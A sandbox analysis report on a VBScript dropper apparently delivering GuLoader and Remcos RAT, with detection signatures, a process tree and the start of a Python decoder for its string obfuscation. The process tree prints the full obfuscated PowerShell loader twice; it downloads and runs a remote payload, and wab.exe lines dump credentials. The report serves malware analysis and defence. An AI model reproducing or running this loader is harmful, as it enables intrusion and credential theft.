Windows Analysis Report
STATEMENT OF ACCOUNT.vbs

Overview

General Information

Sample name:STATEMENT OF ACCOUNT.vbs
Analysis ID:1465957
MD5:229da25a75bd9df3b4bd92268ed0d2fe
SHA1:fe45ca4366c5f7a5bc6df83bc66e18b691041f4f
SHA256:ec41d23e297c8f8aa407ef610a8f3082a1e103addf113cfe3e4d2ec6733b54e8
Tags:vbs

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5660 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 
str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig ');Skildrerne (Gunflints 'Konkurr$ V.ndibgrigsvaalEfte slo VindicbPrierslaTeltn nlMandsdo:TresindCHippiati LillikrCen.rifcCarumseu AntiagmStolearsSidevejctransfor Gelosii Skarrib Nonp,riProclainR,ppledgUnga,va1Goldaks3Udkaare3Subtera=Keglesp$skyllesPGl,cocoaLftenebrHall,nboForandrlNordmane EksporeNonconssMaskins.ConfratsKunstvapDistriblKalvelbi Un erdtImmatri(Simplic$ColubriFStenf suStnkeprrStandsfiBoghandbKapitaluRub.ikkn.ejlensdDomicil) Ty gde ');Skildrerne (Gunflints 'Ndu gan[J.urnalN HjhuseeO,eosactBic,lor. 
,okhavSCoprop,eAlkoholrBrightsvNecrotyiRidsefjc lejereeInterlaPS,inetsoDipl.piisquawfinOstepintA.acathMInd.rdeaHamartonkortfriaPaasta.gPlanlgneStivnenrDegforh]Kom,ker:Foundfl: Hel,deSJordskreTransvecAg,ntdiu aderskrcoapti iLemlstetUncivilyPolemikPSubs,itr BlisteoCo.ntertBro.kaloP.everic CulturoSk,vbunlBuffsbe Fol,tb= nbigge Later.l[RkvrkerNArckinge VldesftProcent.de.mareSAntisepeReflekscBjergaruConniverKaynetfiEskamottDrypsseyNeiatidP P rrelrResinizo anzonet HypertoFonematcFarmlano Rneb,ilplastsfTdiningmy ImperspSterlaneUndervu]Svagt.e: Incine:RegildfTC.evisvlthermicsChi ois1 Satin.2Buffoon ');$Parolees=$Circumscribing133[0];$Tubae= (Gunflints 'Surclif$takeup.gmedaljelrelstatoB.rgmesbE ilemmaDribledl Stepch: up,rtiA PrograkRepavestAmaze saKdehusfnGeograft,eflatim under o Ce,sordoricycleV,stenfledvinscsCons.bs=KommandNIndefrye DurianwMammoni-,eprievO.accinibStrafpojBesvarbeTvety,icDunnabstLamslaa .hokolaSwoadedey Pe,tapsAtingantcigare e Wronskm Gigado.Bem strNLithophe.ynipidtPostmes. Ge metWHighlane.ellbirbdecim lCOutswinlv,vacehikmpestoeBesyngenS ibestt');$Tubae+=$Kundetjenestens[1];Skildrerne ($Tubae);Skildrerne (Gunflints 'Adresse$ PengelAKabardck Coun,etUfrihedaAlenlannSkalotttAsse,temPromerco Ste.dddSodalite Ska arl.istandsUnderpi.Bl ckfeHKnkkreseK,nspeoaphotogrdPredamneBarytafrUdke nes Bejdse[omhandl$StandarsRumsterpS,krestlF ltrediSynkopefUnpsychfSlalomk]fejltry=Scriptu$FourageCSulphopr B omsty MelicrpBiograftHurdlenoSmdexclgHelfredlLytter a Rebuttu N,ncomx Campe, ');$Lbetidens=Gunflints ' r maun$PardeddAFrilandkDimmestt Nu,bedaAngakoknReauthotUnpeggemE.tersloImpeevid nticomeIchthyil O.ticisHavar r. 
A.trinD GribanoFleshl wC,ristenG.ossopl Tris.eoAnimi ma Jagg.ed I,dekoFAce.ylsiOnsswiml Gearale Calibe(tryksva$PreschoPParitetaeffoliarStrawbro UnvitilKaffekoeO.ooutpe Libid.sCurariz, Hypopo$tndehvlAMixbloorPrimovinTbruddeoHomoeoglBrandbyd StandasMatchet)Pik nte ';$Arnolds=$Kundetjenestens[0];Skildrerne (Gunflints 'M.rkeds$UnpropegLoquitulBlankebo,ristesbBrigadeaRullendlDi.turb:SensomoKGleanabfDisagretGreggrie Bumpi,r ,ortcusTr posp=Okkerfo(GlossopT Scan.ae injenusContractAethere-AfbrydePBenzinsaFokuse.t banalehPorop.y Minimum$.nfeminA lagg,rrGr ynesnvognfuloForge slPti,imndSjldenhs Re.nbu)Snorker ');while (!$Kfters) {Skildrerne (Gunflints 'Acetoni$ Spa drgPtyali.lPrdikatoBor.glybSprogfoaLucarnelStylish:Altern,FUndvreraraxingpaNaalenedSomatoce,usiodi=Nedslag$FunctiotUdbytter PhobicuLuftvaae Recipr ') ;Skildrerne $Lbetidens;Skildrerne (Gunflints ' ForrenSMellemttTy letsa orgivrBrugel,tUpupakr-CirkulrSIfuga,ulEarflapeIndst,de BriarepSlisken Rudeskr4flashly ');Skildrerne (Gunflints 'F,rudbe$ Bentjegkvintetl TermomoSem.orgb epetrpa GotfrelUskadel:KransenK Rebaptf Udmrk.tGaylefreLeopardrmoralizs Infor =Fastkr ( onfesTTab osieUnfondns hangertstereos- DustouPbudgiesaSchistatPrinterh Improb Demogra$Urede,bA Kas kurTrommetnCari atoK ndinglKnalderdForud.esKarakte).ryllup ') ;Skildrerne (Gunflints 'acceler$CognacegMorfinil GennemoMangonibEfterfoaLipodyslteleuto:Pat ticSCente ec HjovneaSmaaovem DoctorpRonnif iRagtimeeP oalcosTonneau=Sphecin$Rambledg .arietlkons,ruoSanmar,bOktavera DagldelHobende:ReflowiCSystal ahydrocotPentagyhJatropha,dresserDeweddoimarchern Afvbni+Lsehast+Oriflam%Udspalt$ReflexoCKargoeriCentigrrPaa aefcDis avouSubtensmUnderspsT.oublecEcrus,arRligs eisaggonibKok,ttoiJohannenchylifig Reli,t1Tilbund3Ama,gam3 amvitt.GrassmecUpaaagtoSporinguStaktopnTjattentLantern ') ;$Parolees=$Circumscribing133[$Scampies];}$Bibliomanis=316121;$Rehumanized=28218;Skildrerne (Gunflints 'Zincode$Kjoveacgsnu fbolSe ibaroSpectrobMaalscoa Rubinsl Mononu: isidenao 
ducerlA.legatfK,ypteraSpekulabdaemonye PlanlgtSolvolyiProgramsRidglinePhage erBurresneZygosi,sTrangbi Inhabil=Quaff.z IncentrG SteevieAftr,nitTimelns- .ohansCAnth acoFirma anDuksedrtParasite Brogu,nPo,arfot Cellsm Byvaa e$TribadiAChicnesrR.uterenOlivasto Fors,dlA.ainqudtippiessMarty,i ');Skildrerne (Gunflints 'Hy roco$ ChordegUnwithhlReturvroMicrosebSessel.aWagoneelCiviliz:PaategnBLserindvArbejd e BumekslTalmudisRawlplueNinepegr Sk inen edinafeSuburbl Ophobn=Lini mn Unsunke[whosisoS Landssy ImbrexsFal kmntKon,esseTricho mbib iot.IndarbeCB,oknivo KuglelnrappendvAgrobioe Nonvinr U,hailtFrys.di]Un,erst:Narcot.:.estrucFMenagerrMaintenoProportmideyka.BRverkulaLoka plsfoun.fueMisrule6Gus,abl4Sulf,glSAntikomt De,outrMoskvafiAdve.binUnpossigLin.ers(Overpow$KlintekaManhat,lLyocratfOmk,slea easandb OptageeAfsvovltWic,iupiAlbatiosSund,yieKirurgerSy dacteDistriks Labora)Ridesko ');Skildrerne (Gunflints 'defocus$ LigningDanaidelFra.kekohedon,sbCharybdaFattierlBaromet: LinninS ,resteiBalustel aronicv piesineTrllearrFli tlasDroso hmdegradeiCutletftstilli,hNrvrforsNonshri Botswan=Str,nin Cascad[AfhaareSGyp.schy YardwasKom agntOmbudsme.dstyknmTemp.ri.GynaecoT WuffgoeSkuffe.x.ousehotM.croso.Forva.tETre,ketnTorpe.oc Sulp ioPrognosdKlubkamiSalonkonSkumplegKik.ter]Kopsk f:Ptosish:kriminaA CuriouS,ampradCSarpopoITotemisISig,els.Ph.lantGAfstumpeVati,antCrossgrSTern.tft .kulperVict.mii SchoolnIndeflug.kattef(Forespo$ BrokadBKlangenvt iperseAccruablRedundas FlogmaeCommorarKatalogn CatdomeAngloam)Tigh fi ');Skildrerne (Gunflints 'Topwor.$ Fil prgInfloodltrkpa ioBrnebidb ogmrkeaScutel,lSalvier:RuefulnRPrangereFriha nsScrophutRecag ksBetnknit KanskerAutostoaOfr.rwhf,yedropfUdmar seFustagenIngeni,eBlodtabs Afsnit=Brlesin$ KlientSsuspirei Occurel Smackev BarbareTriptllrKardanesAfsendemModellei UnmatutPol.gonhVi.dspesOvovivi.Omg,dedsElsdyrsuOculospbAcarinosDykk netOutlippr AllotriAlteratnRevidergStorcir(Extrabu$UdbredeBPaandteiTelefo.b LnudvilheteropiVulgarioUna.atimEmi sioa MofussnTanglesi 
Accidestrussen,mancipi$FourthlRKvadrateCtosli.hRvhulleu Solecim psigelaHexosepnLini.reiEpidermzGeison,eParatesd.verskr)Noncl n ');Skildrerne $Reststraffenes;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7268 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7372 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 
str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig ');Skildrerne (Gunflints 'Konkurr$ V.ndibgrigsvaalEfte slo VindicbPrierslaTeltn nlMandsdo:TresindCHippiati LillikrCen.rifcCarumseu AntiagmStolearsSidevejctransfor Gelosii Skarrib Nonp,riProclainR,ppledgUnga,va1Goldaks3Udkaare3Subtera=Keglesp$skyllesPGl,cocoaLftenebrHall,nboForandrlNordmane EksporeNonconssMaskins.ConfratsKunstvapDistriblKalvelbi Un erdtImmatri(Simplic$ColubriFStenf suStnkeprrStandsfiBoghandbKapitaluRub.ikkn.ejlensdDomicil) Ty gde ');Skildrerne (Gunflints 'Ndu gan[J.urnalN HjhuseeO,eosactBic,lor. 
,okhavSCoprop,eAlkoholrBrightsvNecrotyiRidsefjc lejereeInterlaPS,inetsoDipl.piisquawfinOstepintA.acathMInd.rdeaHamartonkortfriaPaasta.gPlanlgneStivnenrDegforh]Kom,ker:Foundfl: Hel,deSJordskreTransvecAg,ntdiu aderskrcoapti iLemlstetUncivilyPolemikPSubs,itr BlisteoCo.ntertBro.kaloP.everic CulturoSk,vbunlBuffsbe Fol,tb= nbigge Later.l[RkvrkerNArckinge VldesftProcent.de.mareSAntisepeReflekscBjergaruConniverKaynetfiEskamottDrypsseyNeiatidP P rrelrResinizo anzonet HypertoFonematcFarmlano Rneb,ilplastsfTdiningmy ImperspSterlaneUndervu]Svagt.e: Incine:RegildfTC.evisvlthermicsChi ois1 Satin.2Buffoon ');$Parolees=$Circumscribing133[0];$Tubae= (Gunflints 'Surclif$takeup.gmedaljelrelstatoB.rgmesbE ilemmaDribledl Stepch: up,rtiA PrograkRepavestAmaze saKdehusfnGeograft,eflatim under o Ce,sordoricycleV,stenfledvinscsCons.bs=KommandNIndefrye DurianwMammoni-,eprievO.accinibStrafpojBesvarbeTvety,icDunnabstLamslaa .hokolaSwoadedey Pe,tapsAtingantcigare e Wronskm Gigado.Bem strNLithophe.ynipidtPostmes. Ge metWHighlane.ellbirbdecim lCOutswinlv,vacehikmpestoeBesyngenS ibestt');$Tubae+=$Kundetjenestens[1];Skildrerne ($Tubae);Skildrerne (Gunflints 'Adresse$ PengelAKabardck Coun,etUfrihedaAlenlannSkalotttAsse,temPromerco Ste.dddSodalite Ska arl.istandsUnderpi.Bl ckfeHKnkkreseK,nspeoaphotogrdPredamneBarytafrUdke nes Bejdse[omhandl$StandarsRumsterpS,krestlF ltrediSynkopefUnpsychfSlalomk]fejltry=Scriptu$FourageCSulphopr B omsty MelicrpBiograftHurdlenoSmdexclgHelfredlLytter a Rebuttu N,ncomx Campe, ');$Lbetidens=Gunflints ' r maun$PardeddAFrilandkDimmestt Nu,bedaAngakoknReauthotUnpeggemE.tersloImpeevid nticomeIchthyil O.ticisHavar r. 
A.trinD GribanoFleshl wC,ristenG.ossopl Tris.eoAnimi ma Jagg.ed I,dekoFAce.ylsiOnsswiml Gearale Calibe(tryksva$PreschoPParitetaeffoliarStrawbro UnvitilKaffekoeO.ooutpe Libid.sCurariz, Hypopo$tndehvlAMixbloorPrimovinTbruddeoHomoeoglBrandbyd StandasMatchet)Pik nte ';$Arnolds=$Kundetjenestens[0];Skildrerne (Gunflints 'M.rkeds$UnpropegLoquitulBlankebo,ristesbBrigadeaRullendlDi.turb:SensomoKGleanabfDisagretGreggrie Bumpi,r ,ortcusTr posp=Okkerfo(GlossopT Scan.ae injenusContractAethere-AfbrydePBenzinsaFokuse.t banalehPorop.y Minimum$.nfeminA lagg,rrGr ynesnvognfuloForge slPti,imndSjldenhs Re.nbu)Snorker ');while (!$Kfters) {Skildrerne (Gunflints 'Acetoni$ Spa drgPtyali.lPrdikatoBor.glybSprogfoaLucarnelStylish:Altern,FUndvreraraxingpaNaalenedSomatoce,usiodi=Nedslag$FunctiotUdbytter PhobicuLuftvaae Recipr ') ;Skildrerne $Lbetidens;Skildrerne (Gunflints ' ForrenSMellemttTy letsa orgivrBrugel,tUpupakr-CirkulrSIfuga,ulEarflapeIndst,de BriarepSlisken Rudeskr4flashly ');Skildrerne (Gunflints 'F,rudbe$ Bentjegkvintetl TermomoSem.orgb epetrpa GotfrelUskadel:KransenK Rebaptf Udmrk.tGaylefreLeopardrmoralizs Infor =Fastkr ( onfesTTab osieUnfondns hangertstereos- DustouPbudgiesaSchistatPrinterh Improb Demogra$Urede,bA Kas kurTrommetnCari atoK ndinglKnalderdForud.esKarakte).ryllup ') ;Skildrerne (Gunflints 'acceler$CognacegMorfinil GennemoMangonibEfterfoaLipodyslteleuto:Pat ticSCente ec HjovneaSmaaovem DoctorpRonnif iRagtimeeP oalcosTonneau=Sphecin$Rambledg .arietlkons,ruoSanmar,bOktavera DagldelHobende:ReflowiCSystal ahydrocotPentagyhJatropha,dresserDeweddoimarchern Afvbni+Lsehast+Oriflam%Udspalt$ReflexoCKargoeriCentigrrPaa aefcDis avouSubtensmUnderspsT.oublecEcrus,arRligs eisaggonibKok,ttoiJohannenchylifig Reli,t1Tilbund3Ama,gam3 amvitt.GrassmecUpaaagtoSporinguStaktopnTjattentLantern ') ;$Parolees=$Circumscribing133[$Scampies];}$Bibliomanis=316121;$Rehumanized=28218;Skildrerne (Gunflints 'Zincode$Kjoveacgsnu fbolSe ibaroSpectrobMaalscoa Rubinsl Mononu: isidenao 
ducerlA.legatfK,ypteraSpekulabdaemonye PlanlgtSolvolyiProgramsRidglinePhage erBurresneZygosi,sTrangbi Inhabil=Quaff.z IncentrG SteevieAftr,nitTimelns- .ohansCAnth acoFirma anDuksedrtParasite Brogu,nPo,arfot Cellsm Byvaa e$TribadiAChicnesrR.uterenOlivasto Fors,dlA.ainqudtippiessMarty,i ');Skildrerne (Gunflints 'Hy roco$ ChordegUnwithhlReturvroMicrosebSessel.aWagoneelCiviliz:PaategnBLserindvArbejd e BumekslTalmudisRawlplueNinepegr Sk inen edinafeSuburbl Ophobn=Lini mn Unsunke[whosisoS Landssy ImbrexsFal kmntKon,esseTricho mbib iot.IndarbeCB,oknivo KuglelnrappendvAgrobioe Nonvinr U,hailtFrys.di]Un,erst:Narcot.:.estrucFMenagerrMaintenoProportmideyka.BRverkulaLoka plsfoun.fueMisrule6Gus,abl4Sulf,glSAntikomt De,outrMoskvafiAdve.binUnpossigLin.ers(Overpow$KlintekaManhat,lLyocratfOmk,slea easandb OptageeAfsvovltWic,iupiAlbatiosSund,yieKirurgerSy dacteDistriks Labora)Ridesko ');Skildrerne (Gunflints 'defocus$ LigningDanaidelFra.kekohedon,sbCharybdaFattierlBaromet: LinninS ,resteiBalustel aronicv piesineTrllearrFli tlasDroso hmdegradeiCutletftstilli,hNrvrforsNonshri Botswan=Str,nin Cascad[AfhaareSGyp.schy YardwasKom agntOmbudsme.dstyknmTemp.ri.GynaecoT WuffgoeSkuffe.x.ousehotM.croso.Forva.tETre,ketnTorpe.oc Sulp ioPrognosdKlubkamiSalonkonSkumplegKik.ter]Kopsk f:Ptosish:kriminaA CuriouS,ampradCSarpopoITotemisISig,els.Ph.lantGAfstumpeVati,antCrossgrSTern.tft .kulperVict.mii SchoolnIndeflug.kattef(Forespo$ BrokadBKlangenvt iperseAccruablRedundas FlogmaeCommorarKatalogn CatdomeAngloam)Tigh fi ');Skildrerne (Gunflints 'Topwor.$ Fil prgInfloodltrkpa ioBrnebidb ogmrkeaScutel,lSalvier:RuefulnRPrangereFriha nsScrophutRecag ksBetnknit KanskerAutostoaOfr.rwhf,yedropfUdmar seFustagenIngeni,eBlodtabs Afsnit=Brlesin$ KlientSsuspirei Occurel Smackev BarbareTriptllrKardanesAfsendemModellei UnmatutPol.gonhVi.dspesOvovivi.Omg,dedsElsdyrsuOculospbAcarinosDykk netOutlippr AllotriAlteratnRevidergStorcir(Extrabu$UdbredeBPaandteiTelefo.b LnudvilheteropiVulgarioUna.atimEmi sioa MofussnTanglesi 
Accidestrussen,mancipi$FourthlRKvadrateCtosli.hRvhulleu Solecim psigelaHexosepnLini.reiEpidermzGeison,eParatesd.verskr)Noncl n ');Skildrerne $Reststraffenes;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7456 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7772 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7936 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7944 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7964 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 8036 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 8044 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 8060 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 8068 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
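The PowerShell command line in the tree above is the GuLoader stage. Every string it needs is passed through a function the script names Gunflints, which returns one character out of every eight (indices 7, 15, 23, ...) and stops one short of the end, so the final eight-character junk chunk is discarded. Both the substring length and the loop bound depend on $Sinologi, which is only incremented when ${host}.CurrentCulture is non-null; under a script emulator with a stub host every decoded string comes back empty, which is a cheap anti-analysis gate. The Skildrerne wrapper then runs `&($Cumulates)` on each decoded string, so $Cumulates is the cmdlet that actually executes the stage. The decoder below is an added example written for this page, not code from the report or from the sample: the four blobs are copied verbatim from the command line above, while the function names, the regex and the output layout are my own. It runs offline and recovers the User-Agent header the loader sets, the URL it fetches and the alias that Skildrerne invokes.

```python
"""Decoder for the Gunflints string obfuscation in the PowerShell stage above.

Added example for this page, not code from the report or from the sample.
The blobs are copied verbatim from the command line in the process tree;
function names, the regex and the output format are assumptions of mine.
"""
import re


def gunflints(blob: str, start: int = 7, step: int = 8) -> str:
    """Python equivalent of the script's Gunflints function.

    Original logic, with $Sinologi == 1:
        $Guvnor = $Handsawfish.Length - $Sinologi
        for ($i = 7; $i -lt $Guvnor; $i += 8) { $out += $Handsawfish.Substring($i, $Sinologi) }
    i.e. take index 7, 15, 23, ... but stop before Length-1, which drops the
    trailing 8-character junk chunk that every blob ends with.
    """
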